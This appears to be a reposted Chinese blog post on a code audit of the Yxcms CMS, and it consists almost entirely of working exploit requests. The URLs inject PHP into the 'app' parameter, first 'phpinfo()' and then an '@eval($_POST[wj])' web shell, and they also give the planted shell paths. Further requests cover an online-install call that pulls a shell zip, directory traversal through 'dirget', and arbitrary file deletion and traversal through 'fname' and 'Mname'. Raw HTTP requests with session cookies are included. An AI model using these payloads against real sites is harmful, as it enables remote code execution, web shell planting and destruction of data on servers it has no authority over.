http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=123
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');phpinfo();//
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');@eval($_POST[wj]);//
http://192.168.0.106/protected/apps/default/view/default/wj.php
http://192.168.0.106/protected/apps/default/view/default/acomment.php
http://192.168.0.106/protected/apps/wj/wj.php
http://192.168.0.106/index.php?r=appmanage/index/onlineinstall&url=http://192.168.0.106/wj.zip
http://192.168.0.106/protected/apps/wj/wj.php
POST /index.php?r=admin/sort/newsedit&id=100024 HTTP/1.1
Host: 192.168.0.106
Content-Length: 1309
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1mQQezLmVeBrWBoX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="parentid"
0
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="sortname"
分类信息
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="picture"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="oldpicture"
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="keywords"
分类信息演示
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="description"
分类信息演示
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="num"
10
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="tplist"
news_sortindex
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="cnlist"
news_content*
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="norder"
0
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="ifmenu"
1
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="extendid"
0
------WebKitFormBoundary1mQQezLmVeBrWBoX--
有第一处注入就有第二处注入,时间宝贵,不搞了
目录遍历
无效过滤
http://192.168.0.106/index.php?r=admin/files/index&dirget=/../../../../../../../
目录遍历也有好几处,其他不写了
任意文件删除
http://192.168.0.106/index.php?r=admin/files/del&fname=../../../../../../../../../../../../../1.txt
文件名、路径拼接
POST /index.php?r=admin/set/tpgetcode HTTP/1.1
Host: 192.168.0.106
Content-Length: 50
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close
Mname=/../../../../../../../../../../&fname=/1.csv
POST /index.php?r=admin/set/tpgetcode HTTP/1.1
Host: 192.168.0.106
Content-Length: 50
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close
Mname=/&fname=/../../../../../../../../../../1.csv
原文始发于微信公众号(Jie安全):Yxcms代码审计后台RCE(0day)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论